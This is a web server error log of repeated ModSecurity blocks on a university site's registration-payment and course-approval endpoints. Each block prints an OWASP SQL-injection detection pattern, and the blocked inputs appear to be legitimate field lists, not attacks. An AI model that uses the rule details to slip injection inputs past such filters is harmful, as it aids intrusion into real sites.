[Tue Aug 29 09:40:27.800699 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfi8AAAAj"]
[Tue Aug 29 09:40:27.975447 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1am8Co-f0AAPjIfjAAAAAj"]
[Tue Aug 29 09:40:28.150994 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjEAAAAj"]
[Tue Aug 29 09:40:28.316669 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjIAAAAj"]
[Tue Aug 29 09:40:28.486560 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjMAAAAj"]
[Tue Aug 29 09:40:28.664372 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjQAAAAj"]
[Tue Aug 29 09:40:28.871180 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1anMCo-f0AAPjIfjUAAAAj"]
[Tue Aug 29 09:40:29.063507 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjYAAAAj"]
[Tue Aug 29 09:40:29.447162 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjcAAAAj"]
[Tue Aug 29 09:40:29.624225 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjgAAAAj"]
[Tue Aug 29 09:40:29.792149 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjkAAAAj"]
[Tue Aug 29 09:40:29.975321 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ancCo-f0AAPjIfjoAAAAj"]
[Tue Aug 29 09:40:30.224283 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfjsAAAAj"]
[Tue Aug 29 09:40:30.415554 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfjwAAAAj"]
[Tue Aug 29 09:40:30.583233 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfj0AAAAj"]
[Tue Aug 29 09:40:30.743459 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfj4AAAAj"]
[Tue Aug 29 09:40:59.878306 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1au8Co-f0AAPlpRg4AAAAS"]
[Tue Aug 29 09:40:59.878419 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1au8Co-f0AAPlpRg4AAAAS"]
[Tue Aug 29 09:41:08.192737 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231423x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231431x-x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222x55201x-x411..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1axMCo-f0AAPjIfkEAAAAj"]
[Tue Aug 29 09:41:28.313029 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2MCo-f0AAPlpRg8AAAAS"]
[Tue Aug 29 09:41:29.861761 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2cCo-f0AAPlpRhAAAAAS"]
